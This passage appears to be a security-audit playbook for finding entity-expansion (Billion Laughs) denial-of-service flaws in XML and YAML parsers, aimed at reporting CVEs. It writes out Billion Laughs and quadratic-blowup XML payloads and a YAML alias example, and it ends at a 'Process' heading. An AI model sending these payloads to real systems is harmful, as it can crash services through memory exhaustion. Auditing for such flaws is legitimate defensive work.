entity-expansionlisted

# Entity Expansion (Billion Laughs) Detection ## When to Use Audit any package that parses XML, SVG, HTML with entity support, or YAML with alias/anchor support. This includes: - XML/SVG parsing libraries - Document processors (DOCX, XLSX, RSS, Atom, SOAP) - YAML parsers with alias expansion - Configuration file parsers ~90% CVE acceptance rate when confirmed. ## Key Insight Many parsers have NO default entity expansion limit. A 1KB XML payload with recursive entity definitions can expand to 1GB+ in memory, crashing the process with an OOM kill (uncatchable — process dies). ## Entity Expansion Types ### 1. Billion Laughs (Internal Entity Recursion) ```xml <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> ... <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <root>&lol9;</root> ``` Each level multiplies by 10. Level 9 = 10^9 = 1 billion "lol" strings. ### 2. Quadratic Blowup (Single Entity Repeated) ```xml <!DOCTYPE foo [ <!ENTITY a "AAAAAAAAAA..."> <!-- 50KB entity --> ]> <root>&a;&a;&a;&a;&a;...&a;</root> <!-- 50000 references --> ``` Less dramatic but still effective — 50KB entity × 50000 refs = 2.5GB. ### 3. YAML Alias Expansion ```yaml a: &anchor x: *anchor y: *anchor ``` Recursive alias references can cause exponential expansion in some YAML parsers. ## Process